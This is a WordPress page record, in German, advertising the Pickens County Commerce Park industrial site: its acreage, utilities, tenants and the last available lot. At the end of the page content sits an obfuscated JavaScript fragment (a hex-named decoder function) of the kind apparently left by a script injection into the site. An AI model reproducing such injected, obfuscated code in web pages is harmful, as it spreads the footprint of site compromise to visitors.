{"id":11981,"date":"2020-12-04T17:56:53","date_gmt":"2020-12-04T17:56:53","guid":{"rendered":"http:\/\/alliancepickens.com\/standorte-gebaeude\/pickens-county-commerce-park\/"},"modified":"2020-12-04T17:56:54","modified_gmt":"2020-12-04T17:56:54","slug":"pickens-county-commerce-park","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/pickens-county-commerce-park\/","title":{"rendered":"Pickens County Commerce Park"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;9814&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][vc_column_text]Der Pickens County Commerce Park ist ein 310 Hektar gro\u00dfer Industriepark der Klasse A mit einer erstklassigen Fassade auf dem vierspurigen US Highway 123. Der Pickens County Commerce Park verf\u00fcgt \u00fcber eine komplette Versorgungsinfrastruktur, die 2 Stromversorger, einen speziellen Glasfaserschalter, eine gro\u00dfe Abwasserkapazit\u00e4t, eine Wasserkapazit\u00e4t und einen Wasserspeicher mit einer Gallone umfasst, der f\u00fcr die Nutzung durch Commerce Park-Einrichtungen vorgesehen ist.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_video link=&#8221;https:\/\/youtu.be\/P9cls2EmFko&#8221;][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/2&#8243;][vc_video link=&#8221;https:\/\/youtu.be\/r9VClCbSsmo&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_video link=&#8221;https:\/\/youtu.be\/wZQoJ4p6FMo&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;5565&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_column_text]<\/p>\n<h3><\/h3>\n<h3 style=\"text-align: center\">Unternehmen im Pickens County Commerce Park:<\/h3>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Abbott<\/li>\n<li>era-kontakt USA<\/li>\n<li>IPSUM-Technologien<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>JR Automation Technologies<\/li>\n<li>KeyMark, Inc.<\/li>\n<li>Zuverl\u00e4ssige automatische Sprinkler-Firma<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Safeplast USA<\/li>\n<li>Taylormade<\/li>\n<li>United Tool und Form<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][\/vc_row_inner][vc_column_text]<\/p>\n<h3 style=\"text-align: center\"><\/h3>\n<h3 style=\"text-align: center\">Pickens County Commerce Park Features umfassen:<\/h3>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Industriepark Klasse A<\/li>\n<li>Schutzb\u00fcndnisse in Kraft | <a href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/PCCP-Protective-Covenenants-1.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Lesen Sie mehr<\/a><\/li>\n<li>Zwei Umspannwerke und zwei Stromversorger<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Digitaler Faserschalter vor Ort<\/li>\n<li>Robuste Infrastruktur vorhanden<\/li>\n<li>\u00dcber 1,1 Millionen Quadratmeter Baufl\u00e4che<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Campus-\u00e4hnliche Umgebung<\/li>\n<li>Zwischen Charlotte, NC und Atlanta, GA<\/li>\n<li>Eine verbleibende Website<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][\/vc_row_inner][vc_column_text el_class=&#8221;fullbtn&#8221;]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/de\/standorte-gebaeude\/pickens-county-commerce-park\/\">Erfahren Sie mehr \u00fcber den Pickens County Commerce Park<\/a>[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_empty_space][vc_column_text]Wenn Ihr Unternehmen mehr \u00fcber den letzten verf\u00fcgbaren Industriestandort im Pickens County Commerce Park erfahren m\u00f6chten, wenden Sie sich bitte <a href=\"http:\/\/alliancepickens.com\/de\/ueber-uns\/#contact\">an <\/a>Alliance Pickens. <a href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/PCCP-Protective-Covenenants.pdf\">Sehen Sie sich die Schutzb\u00fcndnisse f\u00fcr den Pickens County Commerce Park<\/a> an[\/vc_column_text][vc_empty_space][vc_single_image image=&#8221;10659&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/PCCP-1.pdf&#8221;][vc_empty_space][vc_column_text]<span style=\"font-weight: 400\">Site A ist der letzte Standort im Pickens County Commerce Park. Zwanzig (20) Hektar auf der Tischplatte blicken auf die Blue Ridge Mountains. Das Drohnen-Filmmaterial zeigt Renderings f\u00fcr ein (1) und zwei (2) Geb\u00e4udelayouts. Diese Renderings folgen den grundlegendsten  <\/span><span style=\"font-weight: 400\">Standards, die in den Pickens County <\/span> <span style=\"font-weight: 400\">Commerce Park Protective Covenants<\/span> etabliert wurden.[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;10665&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">Erfahren Sie mehr \u00fcber Sites &amp; Buildings<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;19&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Bereit f\u00fcr den Einstieg?<\/h1>\n<h3>Wir freuen uns auf ein Gespr\u00e4ch mit Ihnen!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Kontaktieren Sie unser Team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;9814&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][vc_column_text]Der Pickens County Commerce Park ist ein 310 Hektar gro\u00dfer Industriepark der Klasse A mit einer erstklassigen Fassade auf dem vierspurigen US Highway 123. Der Pickens County Commerce Park verf\u00fcgt \u00fcber eine komplette Versorgungsinfrastruktur, die 2 Stromversorger, einen speziellen Glasfaserschalter, eine gro\u00dfe Abwasserkapazit\u00e4t, eine Wasserkapazit\u00e4t und einen Wasserspeicher mit einer&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":8606,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-11981","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Pickens County Commerce Park - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/pickens-county-commerce-park\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pickens County Commerce Park - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;9814&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][vc_column_text]Der Pickens County Commerce Park ist ein 310 Hektar gro\u00dfer Industriepark der Klasse A mit einer erstklassigen Fassade auf dem vierspurigen US Highway 123. Der Pickens County Commerce Park verf\u00fcgt \u00fcber eine komplette Versorgungsinfrastruktur, die 2 Stromversorger, einen speziellen Glasfaserschalter, eine gro\u00dfe Abwasserkapazit\u00e4t, eine Wasserkapazit\u00e4t und einen Wasserspeicher mit einer&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/pickens-county-commerce-park\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T17:56:54+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/standorte-gebaeude\\\/pickens-county-commerce-park\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/standorte-gebaeude\\\/pickens-county-commerce-park\\\/\",\"name\":\"Pickens County Commerce Park - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\"},\"datePublished\":\"2020-12-04T17:56:53+00:00\",\"dateModified\":\"2020-12-04T17:56:54+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/standorte-gebaeude\\\/pickens-county-commerce-park\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/de\\\/standorte-gebaeude\\\/pickens-county-commerce-park\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/standorte-gebaeude\\\/pickens-county-commerce-park\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Standorte &amp; Geb\u00e4ude\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/standorte-gebaeude\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Pickens County Commerce Park\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Pickens County Commerce Park - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/pickens-county-commerce-park\/","og_locale":"de_DE","og_type":"article","og_title":"Pickens County Commerce Park - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;9814&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][vc_column_text]Der Pickens County Commerce Park ist ein 310 Hektar gro\u00dfer Industriepark der Klasse A mit einer erstklassigen Fassade auf dem vierspurigen US Highway 123. Der Pickens County Commerce Park verf\u00fcgt \u00fcber eine komplette Versorgungsinfrastruktur, die 2 Stromversorger, einen speziellen Glasfaserschalter, eine gro\u00dfe Abwasserkapazit\u00e4t, eine Wasserkapazit\u00e4t und einen Wasserspeicher mit einer&hellip;","og_url":"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/pickens-county-commerce-park\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T17:56:54+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/pickens-county-commerce-park\/","url":"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/pickens-county-commerce-park\/","name":"Pickens County Commerce Park - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/de\/#website"},"datePublished":"2020-12-04T17:56:53+00:00","dateModified":"2020-12-04T17:56:54+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/pickens-county-commerce-park\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/pickens-county-commerce-park\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/pickens-county-commerce-park\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/de\/"},{"@type":"ListItem","position":2,"name":"Standorte &amp; Geb\u00e4ude","item":"https:\/\/alliancepickens.com\/de\/standorte-gebaeude\/"},{"@type":"ListItem","position":3,"name":"Pickens County Commerce Park"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/de\/#website","url":"https:\/\/alliancepickens.com\/de\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/11981","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/comments?post=11981"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/11981\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/8606"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/media?parent=11981"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}